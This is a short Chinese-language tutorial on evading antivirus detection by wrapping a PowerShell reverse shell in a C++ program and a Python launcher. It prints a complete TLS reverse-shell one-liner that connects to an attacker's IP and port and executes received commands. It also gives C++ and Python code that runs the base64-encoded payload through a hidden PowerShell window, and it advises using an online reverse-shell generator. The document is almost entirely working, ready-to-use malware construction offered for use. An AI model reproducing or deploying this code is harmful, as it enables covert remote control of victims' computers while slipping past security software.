C++,Python联动 基本全免杀(入门)
C++,Python联动Powershell基本免杀
C++,Python联动Powershell基本免杀 作者:liusuxy 难易程度: 一颗星
注意:由于方法简单,可能有人做过
效果如下:
-> 这里只是简单的绕过
步骤:
1.生成代码核心(powershell部分)并将核心转为base64
2.更改模板
3.调试生成exe
一 · 生成代码核心(powershell部分)
一 · 生成代码核心(powershell部分)
方案一
(推荐):
转到在线反弹shell生成,依次输入IP,PORT,接着往下翻,复制
Powershell #3(Base64)中Base64部分
方案二
(不推荐):
将
$TCPClient = New-Object Net.Sockets.TCPClient('控制端IP', 控制端PORT);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
转为Base64,复制
二 · 更改模板
二 · 更改模板 作者使用的模板(run_main.exe , 免杀.cpp)
- 免杀.cpp
#include
#include
int main()
{
system("run_main.exe 这里加上刚刚复制的核心");
//大家可以自己写一个run_main.exe
return 0;
}
三 · 调试生成exe
三 · 调试生成exe 直接调试即可,不懂百度查 VS/Dev-C++/... 调试?
相关资源
相关资源
- 作者建议自己编写run_main.exe
- 这里放出run_main.py的源码(可以自己pyinstaller转成exe)
import os,sys
cmd = ''
cmd_list = sys.argv[1::]
for i in cmd_list:
cmd = cmd+i+' '
os.system('powershell -w hidden -nop -e {0}'.format(cmd))
-作者最近会将run_main.exe发布
再见
再见